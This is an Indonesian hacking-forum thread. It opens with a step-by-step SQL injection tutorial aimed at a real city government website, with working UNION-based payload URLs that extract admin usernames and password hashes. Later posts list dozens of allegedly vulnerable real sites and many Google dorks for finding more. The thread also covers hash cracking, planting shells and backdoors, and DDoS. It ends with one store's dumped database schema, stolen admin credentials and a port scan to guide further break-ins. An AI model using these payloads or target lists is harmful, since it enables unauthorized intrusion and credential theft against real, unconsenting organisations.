[dark tutorial] exploitasi site dgn SQLi

[bl00d13z]

dlu ada yg pernah request tutorial jebol2 site, sapa ya? ;p nah ni ane kasih dkit penjelasannya.. gw ambil dr tutor tmn ane di JS brotha p1t4qh ^ ^, tpi gw edit dkit targetnya, webnya jgn diacak2 ya klo dah pada bisa..yg ngacak2 gw acak2 lagi komp lu tar.. di siteny dah gw tanem logger klo da yg berani deface2.. ok kita langsung praktekin :

target kita adalah web yg memang memiliki vulnerability(baca:celah keamanan) yaitu SQL inject, SQL-i juga ada 2 metoda ada SQL-i biasa ada yg blind SQL-i..vulner di web juga ga hanya SQL-i aja, tapi ada macem2,antara lain : LFI(Local File Inclusion), RFI(Remote File Inclusion), RCE(Remote Command Execuiton), sama XSS (Cross Site Script) bukan CSSjadinya ya..klo ntu ma buat style2 html

SQL(Structured Query Language): cari di mbah google aja ya klo masih bngung itu apaan..

ok sblum gw masuk ke langkah2 SQL-i ada beberapa yg perlu diperhatikan dr seorang hacker2 lamers yg kerjanya deface2, mereka bukan mencari target tapi mencari vulner.. coba si hacker yg sering deface2 itu gw sruh jebol situs FBI, gw jamin dia geleng2 karna dia cm tau vulner tertentu, udah pasti site2 FBI keq gtu mana ada vulner SQL-injectnya, karena ini vulner dan teknik lama. meskipun teknik jadul tp hacker2 harus tau teknik ini..
kalau tadi saya suruh si hacker jebol sebuah site sekarang saya suruh dia jebol site apapun sebanyak mungkin..dan pastinya dia bisa lakuin bermodal vulner yg dia tau tadi(misal SQL-i), jadi sebenarnya ada perbedaan antara hacker lamers yg tidak beretika dan hacker proffesional yg sangat beretika, semakin menakutkan seorang hacker dilihat dari kemampuan ia mengenal vulner dan memanfaatkannya ^ ^

ok kita bahas vulner legendaris yg satu ini

Berikut ini akan disajikan langkah demi langkah SQL Injection yang diimplementasikan pada web http://www.bandung.go.id. nah loh...website pemerintah kota bandung booo...disini ternyata ada vulner SQL-i nyaTutorial ini hanya untuk pembelajaran dan pengetahuan (just to share) dan untuk para master yang telah berpengalaman dianjurkan memberikan masukan agar tekniknya menjadi lebih menarik. :mrgreen:

kunci dari exploitasi ini adalah kesabaran

Langkah-langkahnya sebagai berikut :
1. Lakukan pengecekan dengan memasukkan karakter tanda petik satu single_quote ( ' ) dan mengujinya dengan operator logika ( AND ).

Code:

http://bandung.go.id/?fa=sitedownload.category&id=9'

Hasil Uji :
-Halaman akan menampilkan pesan error

Code:

Fatal error: Call to a member function RecordCount() on a non-object in /data1/web/public_html/site/download/qry_download_cat.php on line 6

Code:

http://bandung.go.id/?fa=sitedownload.category&id=9+and+1=1
http://bandung.go.id/?fa=sitedownload.category&id=9+and+1=6

Hasil Uji :
-Pada pengecekan AND+1=1 yang dihasilkan adalah TRUE, maka halaman akan tampil secara normal.
-Pada pengecekan AND+1=6 hasilnya adalah FALSE, halaman akan menampilkan pesan kesalahan (tidak berjalan normal), disini pagenya jadi kosong.

2. Memeriksa jumlah field dari suatu tabel. Perintah yang digunakan adalah ORDER+BY+num, lakukan penambahan/increment pada variabel num. Parameternya adalah jika field masih tersedia maka halaman akan berjalan normal, namun sebaliknya jika field tidak tersedia maka halaman akan menampilkan pesan error. Pada contoh kali ini ditemukan batas akhir field sampai pada angka 4.

Code:

http://www.gunungkidulkab.go.id/home.php?mode=content&submode=detail&id=870+order+by+4--

Mengapa ada tanda -- diakhir perintah? Tanda -- adalah parameter komentar pada sintaks sql, bisa juga menggunakan /*. Sesuai dengan fungsinya kita akan men-set komentar terhadap sintaks setelah klausa WHERE. Kebetulan pada contoh kasus kali ini, setelah klausa WHERE terdapat perintah sql yg lain entah itu ORDER atau LIMIT. Untuk itu digunakan parameter komentar agar perintah sql tersebut tidak dijalankan sehingga kita mendapatkan pesan error jika field yang di ORDER tidak tersedia.

Coba bandingkan jika parameter komentar tidak digunakan, meskipun kita melakukan ORDER BY 1 dan ORDER BY 100 halaman akan tetap menampilkan pesan error. Kalau kejadiannya seperti ini dari mana kita bisa mengetahui jumlah field yang di-select??

3. Mengeluarkan nomor field untuk menampilkan informasi yang diinginkan. Perintah yang digunakan adalah UNION+ALL+SELECT+no_field+no_field+....

Code:

http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,2,3,4--

Pada contoh kali ini, variabel id kita beri nilai null agar angka-angka yang kita deklarasikan keluar, atau bisa juga menggunakan tanda minus (id=-870). Dari angka-angka yang tercetak pada halaman web, kita akan mengeluarkan informasi dari versi mysql, nama database dan nama user.

Code:

http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,concat_ws(0x2B,version(),database(),user()),3,4--

4. Selanjutnya kita akan mengeluarkan nama-nama tabel dengan perintah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(TA BLE_NAME)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TAB LE_SCHEMA=DATABASE(). Gunakan klausa WHERE TABLE_SCHEMA=DATABASE(), agar tabel yang keluar adalah tabel dari database yang digunakan. Kalau Anda ingin melihat seluruh tabel dari seluruh database klausa WHERE tidak perlu Anda gunakan.(catatan=INFORMATION_SCHEMA hanya untuk SQL ver 5 keatas, utk ver 4 query ini tidak akan bisa digunakan

Code:

http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--

Pada perintah diatas, Anda dapat mengganti concat_ws(0x2B,version(),database(),user()) dengan angka 2, jika Anda tidak ingin menampilkan informasi tentang versi mysql, nama database, dan nama user.

5. Nama tabel telah kita ketahui, selanjutnya kita akan mengeluarkan nama field dari tabel yang menyimpan UserID dan Password pengguna. Pada website ini nama tabel yang dimaksud adalah tuser. Sintaks dasarnya adalah UNION+ALL+SELECT+no_field+no_field+GROUP_CONCAT(CO LUMN_NAME)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME='NAMA_TABLE'. Jika terjadi error maka kita harus meng-konversi nama tabel ke bentuk hexadecimal_sql sehingga menjadi 0x7475736572

Code:

http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x7475736572--

6. Langkah terakhir kita akan mengeluarkan record-record dari tabel tuser. struktur perintahnya adalahUNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE. Kalau dijalankan pada contoh kasus kali ini menjadi :

Code:

http://bandung.go.id/?fa=sitedownload.category&id=null+union+select+1,concat_ws(0x3a,userid,pwd),3,4+from+tuser--

nahh.. keliatan kan username admin ama hash passwordnya.. sisanya tinggal ***** tu hash(decrypt), jenisnya harus tau dlu apakah md4,md5,sha1,dll. kadangkala ada pula yg ga dienkrip,ini fatal banget klo sampe ga dienkrip.

kalo udah dapet passwd trus ngapain?,ya tgl cari page admin nya..login trus terserah deh mau diapain,. dah jadi super admin ini^^ sory ga gw kasih tau pagenya dmn..just learning

Sampai disini selesai sudah penyajian penulis mengenai langkah demi langkah SQL Injection pada Web pemerintah kota bandung. saya tidak bertanggung jawab atas segala dampak negatif akibat penyalahgunaan artikel ini.. dan khusus web yg saya ambil sebagai sampel jgn pernah sekali2 coba deface, Mohon dikoreksi jika terdapat kekurangan ataupun kesalahan.

author1t4qh - jasakom mentor & write and edited by: bl00d13z a.k.a b1n4ry_g33k5/c0mrade - jasakom advisor

[koker123]

ea serem dah d pasangin logger

anak jasakom
wakakakakakakak

[bl00d13z]

ea serem dah d pasangin logger

anak jasakom
wakakakakakakak

iya lah..mana tega gw web bangsa ndri diacak2..kecuali klo adminnya nantang..sbnernya ada cara cpetnya buat SQL-i otomatis..tar sy kasih tutorny klo emg pada mau,, berhubung toolsny source code itu jg tar bisa jadi pelajaran sekalian programming..ga sampe 2 mnt web yg vulner sql-i ini udah dpt username ma passwd adminnya..ane mo mandi dlu..hueheu

[Kurt.D.Cobain]

@bl00d13z
gile,keren,...anyway si bro bahaya juga ya ilmunya.... senggol dikit langsung bacok nih.. ahahahahah

[bl00d13z]

@bl00d13z
gile,keren,...anyway si bro bahaya juga ya ilmunya.... senggol dikit langsung bacok nih.. ahahahahah

bused bacok >.< .. anyway nih gw kasih site2 yg bisa buat belajar SQL-i

http://www.cnet.org.uk/news1.php?ID=...@version,3,4--
http://www.corporatedevelopmint.com/... 11,12,13,14--
http://www.michaelpollan.com/article...5,6,7,8,9,10--
http://www.virtuosimedia.com/resourc...@version,3,4--
http://www.lavocedellevoci.it/news1....,@@version,6--
http://www.lavocedellevoci.it/grandi...@version,4,5--
http://www.allfungames.com/games.php...,10,11,12,13--
http://www.purdes.com/blog/art.php?i...,3,4,5,6,7,8--
http://himti.org/news_detail.php?new...a=database()--

itu sekitar 1bulan lalu gw cari2nya.. skrg ga tau uh di patch pa blom, tes2 aj.. ato gunain dork umum wat SQLi ini di google :

Code:

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:trainers.php?id=

[koker123]

banyak juga ya web yg bisa d pake buat latihan lol

btw itu adminnya web bandung tau gak webnya d pake buat ginian
ntar gw nyoba d web itu (padahal cuman mau belajar doang)
eh d isengin lagi ama adminnya
kan berabe ane >.<

nih subforum makin lama makin sadis aja
wkwkwkwkwk

[bl00d13z]

banyak juga ya web yg bisa d pake buat latihan lol

btw itu adminnya web bandung tau gak webnya d pake buat ginian
ntar gw nyoba d web itu (padahal cuman mau belajar doang)
eh d isengin lagi ama adminnya
kan berabe ane >.<

hihi adminya si tau webnya vulner, tp kaga dbner2in..cm gw liat passny ganti2 deh keqnny+strong passwd,jd ngcracknya berat..saran gw sih web2 yg gw kasih aj, ato cb belajar cari sndri gunain dork google yg gw kasih.. tar klo mau ***** hash md5(32bit) ke sini aja http://md5cracker.org/ multi cracking dia, hashny di link ke site2 cracker lainny, tar klo hash ny ada yg cocok di db masing2 site bakal dikasih lgsg passwdny(biasanya passwd2 yg weak), klo ud coba di ***** disitu ga bisa, baru pake sopware ***** sendiri..punya cain n abel kan? disitu bisa, atau klo mau yg ringan n simpel tar gw kasih source codeny, bkin di perl, tp khusus wat md5 aj, met belajar deh ya..klo bngung discuss lg ja dsni,. sbnernya maen2 gnian keq maenan game loh..hehe, cari2 modul web yg bisa diinject..klo dah dpt didokumentasiin,,klo dah pro biasanya malah dijaga itu server,tanem shell buat tar akses lwt backdoor, kalo udh maenan shell itu server udh bs diambil alih n dijadiin budak..suatu saat klo km benci ma sebuah site bisa panggil budak2 km buat down in tu server, maenan dDoS ujg2ny:
anggep site A bandwidthnya 500mbps, gw punya budak server 10 bji masing-masing bandwidthny 100mbps, klo gw sruh si budak download halaman utama page site A berulang-ulang(looping) apa yg terjadi? resource bandwidth si site A habis buat layanin budak2 gw..nahh ga bisa diakses deh jadinya selama gw ga brentiin loopingnya.. wah ngeri ya >.<

[bl00d13z]

nih ane tambah lagi site path yg vulner..barusan habis jajal,.tgl lanjutin ama query2 sqlnya..^ ^selamat bermain..

http://www.spoono.com/php/tutorials/...al.php?id=2309
http://www.export-japan.com/search/?...ct.php%3Fid%3D'
http://www.plus2net.com/php_tutorial...g_dtl.php?id=5
http://www.karat.org/index.php?pageId=358
http://www.aecl.org/index.asp?pageid=379
http://www.caot.ca/CAOT_career_listings.asp?pageid=1001
http://www.bettertextures.com/preview.php?id=90
http://www.allianceprojectservices.c...review.php?id=
http://www.visiontechdigital.com/np/preview.php?id=
http://www.fanfooty.com.au/game/preview.php?id=3248
http://www.readyicons.com/iconset-preview.php?id=8
http://www.myspacelayouts.us/preview.php?id=106
http://www.ultimatemyspace.com/preview.php?id=
http://www.operationsports.com/preview.php?id=63
http://www.edenslostandfound.org/hom...iew.php?id=225
http://www.columbiachronicle.com/pap...ns.php?id=1612
http://www.creditdeals.com/support/opinions.php?id=192
http://www.toorista.com/opinions.php?lang=fr&debut=100
http://www.wetcnu.com/opinions.php?n...atest&start=12
http://www.cityofpoughkeepsie.com/download.php?id=68
http://www.907th.com/download.php?id=1
http://www.dod-federation.com/download.php?id=5
http://www.shareapple.com/download.php?id=40166
http://www.chrisroyce.co.uk/album/viewPhoto.php?id=445
http://www.andygrace.com/viewphoto.php?id=41
http://picawin.com/viewphoto.php?id=2
http://www.raypang.com/new/cryfield/viewphoto.php?id=7
http://www.croyce.co.uk/album/viewPhoto.php?id=420
http://www.phpbuddy.com/article.php?id=8 <---- PARAH, masa site berbau php punya vulner SQLi... =_=a
http://www.democracyjournal.org/article.php?ID=6570
http://www.nma-fallout.com/article.php?id=35862

[nveuu]

wah... forum game ene... bkn forum security...
kwakwakwkawaw

parah2 asle....
ampun suhu...


tp share dikit... SQLi fav gw... hehhe... prnah gw kirim bwat sms dia =p

union all select 1,2,group_concat(hatinya,rasanya,inginya),4,5,6,7 from dia--
andai km msh vulner dgn ku... tdk dengan nya... >.<"

hiks2.. jd sedih kl inget lagi...




whoooppppsss OOT!!!!

[bl00d13z]

wah... forum game ene... bkn forum security...
kwakwakwkawaw

parah2 asle....
ampun suhu...


tp share dikit... SQLi fav gw... hehhe... prnah gw kirim bwat sms dia =p

union all select 1,2,group_concat(hatinya,rasanya,inginya),4,5,6,7 from dia--
andai km msh vulner dgn ku... tdk dengan nya... >.<"

hiks2.. jd sedih kl inget lagi...




whoooppppsss OOT!!!!

awkawkkwakwakwa kan IT IT juga.. buahahahah cacad itu query ck,ck,ck..parah2.. ngakak gw

[nveuu]

jadiin siggy aghhh... ....



umm... suhu,,, asking... kalo kyk gini piye???
http://www.grenadegloves.com

http://www.grenadegloves.com/admin/

gmn itu y... ud dapet iki passw e( id : joelumbruso... passw : test ).... u d *****.... e alah... nte bs jua gw....
tp emang rada bingung aink....
login admin nya kok rada beda ya.... kyk pake JS gt....
nte ngertos...

jelasin suhu...
GRP2 ..

[bl00d13z]

jadiin siggy aghhh... ....



umm... suhu,,, asking... kalo kyk gini piye???
http://www.grenadegloves.com

http://www.grenadegloves.com/admin/

gmn itu y... ud dapet iki passw e( id : joelumbruso... passw : test ).... u d *****.... e alah... nte bs jua gw....
tp emang rada bingung aink....
login admin nya kok rada beda ya.... kyk pake JS gt....
nte ngertos...

jelasin suhu...
GRP2 ..

coba cari2 di db yg lainnya bro..ane lom coba dump.ada 5 db kan dsitu, klo dr db aslinya emg ngaco passwdnya.
dbnya kan ini:

Code:

[+] Gathering MySQL Server Configuration...
	Database: grenade
	User: grenade@localhost
	Version: 5.0.32-Debian_7etch5-log
[+] Showing all databases current user has access too!
[+] Number of Databases: 5

[1]grenade
[2]horde
[3]mysql
[4]phpmyadmin_eEs1NuhktKch
[5]psa

tabel2 di db grenade:

Code:

[1]admin_groups: id,text
[2]admin_pages: id,caption,link,extra,gid,display
[3]army: name,rank,aid,dob,email,addy,location,riding,csz,city,state,zip,country,likes,dis,comments,legacy_id,date,display
[4]army_missions: id,mid,mission,statement,date
[5]army_temp: id,name,dob,email,addy,csz
[6]blocked: blockedid,ip,polls
[7]categories: id,name,description,image,parent,rank,status
[8]comment_users: id,name,email,password,date,ip
[9]comments: id,post,user,comment,ip,date,status
[10]dealers: id,state,city,shop,phone,address,zip,country
[11]dingo: id,headline,image,teaser,content,date,status
[12]discounts: id,code,amount,percentage,blanket,items,cats
[13]featured: id,title,text,inventory_id
[14]grenadians: id,name,headline,bio,age,location,date,status
[15]inv_additions: id,parent,name,header,price
[16]inv_cat: id,inventory_id,category
[17]inv_options: id,inventory_id,name
[18]inventory: id,sku,product,image,description,manufacturer,price,retail,now,weight,extra_shipping,no_shipping,no_tax,variation,related,stock,status,featured,popularity,date_added
[19]ip: ipid,title,ip,vote
[20]mailing_list: id,email,date
[21]mk_users: id,user,pass
[22]news: id,headline,image,teaser,content,date,status
[23]old_customers: login,lost_password_email,shipping_first_name,shipping_last_name,shipping_address,shipping_city,shipping_state,shipping_zip,shipping_country,shipping_email,shipping_phone,shipping_fax,shipping_company,billing_first_name,bill_last_name,billing_address,billing_city,billing_state,billing_zip,billing_country,billing_email,billing_phone,billing_fax,billing_company
[24]options: optionid,pollid,options,images,votes,order_id
[25]orders: id,user,session,status,shipping_type,shipping_additions,date,name,email,address,city,state,zip,country,phone,use_ship,billing_name,billing_address,billing_city,billing_state,billing_zip,billing_country,notes
[26]permissions: name,permissions
[27]polls: pollid,title,starts,expires,vote,voting,results,graph,resultsvotes,ip,cookies,subdate,status
[28]product: id,name,cat,style,desc,features,tag
[29]product_cats: id,name
[30]product_flavs: id,product,image_1,image_2,iname
[31]sessions: id,session,user_id,item,additions,options,quantity,amount,gift,date
[32]shipping_rules: id,name,method,price_min,price_max,cost,percentage,parent,addition
[33]tax_rules: id,state,tax,percentage,shipping
[34]team: id,name,image,type
[35]team_bios: id,who,question,answer
[36]users: id

di db psa: <dsni ni bnyk column2 yg bs jd petunjuk penting

Code:

[1]APSApplicationItems: id,license_type_id,pkg_id,shared,disabled
[2]APSClientApplicationItems: id,client_id,app_item_id,instances_limit
[3]APSLicenseTypes: id,application_name,application_versions,application_features,license_type_hash,description
[4]APSLicenses: id,key_number,source,ka_url,expiration_date,update_date,license_type_id,personal
[5]Cards: id,personalName,companyName,phone,fax,email,address,city,state,zip,country
[6]ClientsTraffic: cl_id,date,http_in,http_out,ftp_in,ftp_out,smtp_in,smtp_out,pop3_imap_in,pop3_imap_out
[7]Components: name,version
[8]DashboardPreset: id,name,uri,type
[9]DashboardPresetConfig: id,preset_id,ord,uri,parent_id,type,title,description,enabled
[10]DatabaseServers: id,host,port,type,admin_login,admin_password,last_error,server_version
[11]DomainServices: id,dom_id,type,status,parameters_id
[12]DomainsTraffic: dom_id,date,http_in,http_out,ftp_in,ftp_out,smtp_in,smtp_out,pop3_imap_in,pop3_imap_out
[13]IP_Addresses: id,ip_address,mask,iface,type,ssl_certificate_id,default_domain_id
[14]Limits: id,limit_name,value
[15]ListsParams: user_id,user_type,parentList_id,list_name,flags,sort,filter,page,page_size
[16]Logos: id,name,fake,url
[17]MailLists: id,dom_id,name,status
[18]Modules: id,name,packname,display_name,version,release,description,icon
[19]NewsArticles: id,class,data
[20]Notes: id,text
[21]Notifications: id,status,send2admin,send2client,send2dlu,send2email,email,subj,note_id
[22]PMM: sessionId,param,val
[23]PMMDefault: param,val
[24]Parameters: id,parameter,value
[25]Permissions: id,permission,value
[26]Repository: rep_id,component_id
[27]SBConfig: param_name,param_value
[28]SBResellers: id,client_id,sb_client_login,sb_reseller_id
[29]SBSites: id,virtualHost_id,sb_site_id,sb_siteowner_id,sb_siteowner_login
[30]SSOBranding: http_request_domain,idp_url
[31]SiteAppFiles: instance_id,prefix,file
[32]SiteAppPackages: id,name,version,release,categories,description,access_level,integrated,package_type,params_id
[33]SiteAppResources: app_id,type,res_id,res_param_1
[34]SiteApps: id,app_release,dom_id,dom_type,install_prefix,htdocs_directory,capp_item_id,params_id,license_id
[35]Skins: id,name,place
[36]Templates: id,name,note_id
[37]TmplData: tmpl_id,element,value
[38]WebApps: id,name,status,domain_service_id
[39]accounts: id,type,password
[40]actions: id,name,descr,enabled
[41]ai_vendor_sources: id,type,url,priority,enabled,auth_required,login,password
[42]anon_ftp: id,dom_id,max_conn,bandwidth,incoming,incoming_readable,incoming_subdirs,status,quota,display_login,login_text
[43]apscategories: id,category_name,parent_id
[44]badmailfrom: id,domain
[45]certificates: id,csr,pvt_key,cert,cert_file,ca_cert,ca_file,name
[46]cl_param: cl_id,param,val
[47]clients: id,cr_date,cname,pname,login,account_id,status,phone,fax,email,address,city,state,pcode,country,locale,limits_id,params_id,perm_id,pool_id,logo_id,tmpl_id,sapp_pool_id,guid
[48]cp_access: id,type,netaddr,netmask
[49]custom_buttons: id,sort_key,level,level_id,place,text,url,conhelp,options,file
[50]data_bases: id,name,type,dom_id,db_server_id,default_user_id
[51]db_users: id,login,account_id,db_id
[52]disk_usage: dom_id,httpdocs,httpsdocs,subdomains,web_users,anonftp,logs,dbases,mailboxes,webapps,maillists,domaindumps,configs,chroot
[53]dns_recs: id,dns_zone_id,type,displayHost,host,displayVal,val,opt,time_stamp
[54]dns_recs_t: id,type,displayHost,host,displayVal,val,opt,time_stamp
[55]dns_zone: id,name,displayName,status,email,type,ttl,ttl_unit,refresh,refresh_unit,retry,retry_unit,expire,expire_unit,minimum,minimum_unit
[56]dom_level_usrs: dom_id,account_id,state,card_id,perm_id
[57]dom_param: dom_id,param,val
[58]domainaliases: id,dom_id,dns_zone_id,status,name,displayName,dns,mail,web,tomcat
[59]domains: id,cr_date,name,displayName,dns_zone_id,status,htype,real_size,cl_id,cert_rep_id,limits_id,params_id,guid
[60]event_handlers: id,action_id,priority,user,command
[61]exp_event: id,source,event_type,event_time,obj_class,obj_id,host,user,flushed
[62]forwarding: dom_id,ip_address_id,redirect
[63]hosting: dom_id,sys_user_id,ip_address_id,real_traffic,fp,fp_ssl,fp_enable,fp_adm,fp_pass,ssi,php,php_safe_mode,cgi,perl,python,fastcgi,miva,coldfusion,asp,asp_dot_net,ssl,webstat,same_ssl,traffic_bandwidth,max_connection
[64]itmpl: id,name
[65]itmpl_data: itmpl_id,page,control,state,control_type
[66]key_history: id,plesk_key_id,name,filename,register_date,update_disabled,options
[67]key_history_params: key_id,param,val
[68]locales: id,active
[69]lockout: login,last_wrong,attempts
[70]log_actions: id,date,ip_address,user,action_id,object_id
[71]log_components: action_id,component,old_value,new_value
[72]log_rotation: id,period_type,period,max_number_of_logfiles,compress_enable,email,turned_on
[73]mail: id,mail_name,perm_id,postbox,account_id,redirect,redir_addr,mail_group,autoresponder,spamfilter,virusfilter,mbox_quota,dom_id
[74]mail_aliases: id,mn_id,alias
[75]mail_redir: id,mn_id,address
[76]mail_resp: id,mn_id,resp_name,keystr,key_where,subject,reply_to,content_type,charset,text,resp_on,ans_freq,mem_limit
[77]mass_mail: id,name,from_email,to_admin,to_clients,to_clients_mode,to_domains,to_domains_mode,subject,body,cdate
[78]mass_mail_clients: mm_id,cl_id
[79]mass_mail_domains: mm_id,dom_id
[80]misc: param,val
[81]mn_param: mn_id,param,val
[82]password_secrets: secret,type,id,created
[83]pd_users: id,login,account_id,pd_id
[84]protected_dirs: id,non_ssl,ssl,cgi_bin,realm,path,dom_id
[85]report: id,type,user_id,user_type,name,is_default
[86]report_auto: id,report_id,auto,last,recipient,email,client,domain
[87]report_section: id,report_id,name,type
[88]resp_attach: id,rn_id,filename
[89]resp_forward: id,rn_id,address
[90]resp_freq: id,rn_id,email,num,time_resp
[91]secret_keys: key_id,ip_address,description
[92]sessions: sess_id,type,login,ip_address,login_time,click_time
[93]siteapppackages_apscategories: siteapppackage_id,apscategory_id,order
[94]slave_params: slave_id,parameter,value
[95]slaves: id,hostname
[96]smtp_poplocks: ip_address,ip_mask,lock_time
[97]spamfilter: id,username,preferences,reject_spam
[98]spamfilter_preferences: prefid,spamfilter_id,preference,value
[99]subdomains: id,dom_id,name,displayName,sys_user_type,sys_user_id,ssi,php,cgi,perl,python,fastcgi,miva,coldfusion,asp,asp_dot_net,ssl,same_ssl
[100]sys_users: id,login,account_id,home,shell,quota
[101]tts_cats: id,enabled,title
[102]tts_conf: id,enabled,can_post,def_qu_id,def_pr_id,def_cat_id,mg_enabled,email_address,email_name,pop_server,pop_username,pop_password,query_period,start_ticket_subj
[103]tts_priorities: id,enabled,title
[104]tts_queues: id,enabled,title
[105]tts_reporters: id,ref_reporter_id,type,email,name
[106]tts_slave_info: server_id,enabled,can_post,cnt_new,cnt_opened,cnt_reopened,cnt_closed,updated_date
[107]tts_ticket_events: id,ticket_id,event_type,public,reporter_id,created_date,descr
[108]tts_tickets: id,reporter_id,cat_id,qu_id,pr_id,status,subject,modified_date
[109]upgrade_history: upgrade_date,version_info,db_version
[110]web_users: id,dom_id,sys_user_id,ssi,php,cgi,perl,python,fastcgi,asp,asp_dot_net
[111]webalizer_group_referrer: id,dom_id,group_name,referrer
[112]webalizer_hidden_referrer: id

cb search jg yg di db lainny,. lom gw cb semua.. trus klo dari domain..ada 5 domain di IP dia :

Code:

IP: 72.22.72.202
IP Country: ip address flag United States
 5 Hosts on this IP
Number 	Domain / Host 	Functions
1. 	ww.grenadegloves.com 	[Whois] [Trace] [Visit]
2. 	www.propaganda-snow.com 	[Whois] [Trace] [Visit]
3. 	grenadearmy.com 	[Whois] [Trace] [Visit]
4. 	https: 	[Whois] [Trace] [Visit]
5. 	www.grenadegloves.com 	[Whois] [Trace] [Visit]

nah coba2juga dari situ bro masukny..cari admin pageny jg,. trus klo utk service2 di server ntu :

Code:

Completed SYN Stealth Scan at 09:08, 22.25s elapsed (1000 total ports)
Initiating Service scan at 09:08
Scanning 14 services on vps010-15.vps.securehostserver.com (72.22.72.202)
Completed Service scan at 09:10, 131.23s elapsed (14 services on 1 host)
SCRIPT ENGINE: Initiating script scanning.
Host vps010-15.vps.securehostserver.com (72.22.72.202) appears to be up ... good.
Interesting ports on vps010-15.vps.securehostserver.com (72.22.72.202):
Not shown: 981 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          ProFTPD 1.3.1
22/tcp   open     ssh          OpenSSH 4.3p2 Debian 9 (protocol 2.0)
25/tcp   open     smtp?
53/tcp   open     domain       ISC BIND 9.3.4
80/tcp   open     http         Apache httpd 2.2.3
106/tcp  open     pop3pw       poppassd
110/tcp  open     pop3-proxy   AVG pop3 proxy 7.5.510/7.5.557
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
143/tcp  open     imap         Courier Imapd (released 2004)
443/tcp  open     ssl/http     Apache httpd 2.2.3
445/tcp  filtered microsoft-ds
465/tcp  open     smtps?
993/tcp  open     ssl/imap     Courier Imapd (released 2004)
995/tcp  open     ssl/pop3     Courier pop3d
1434/tcp filtered ms-sql-m
1720/tcp filtered H.323/Q.931
3306/tcp open     mysql        MySQL 5.0.32-Debian_7etch5-log
8443/tcp open     ssl/http     Apache httpd 2.0.46 ((Red Hat) mod_ssl/2.0.46 OpenSSL/0.9.7a)
Service Info: Host: localhost.localdomain; OSs: Unix, Linux, Windows

nah ntu kan da sql server, ama https di port 8443, cb cr admin pageny di httpsny
https://www.grenadegloves.com:8443/v...plesk/frameset
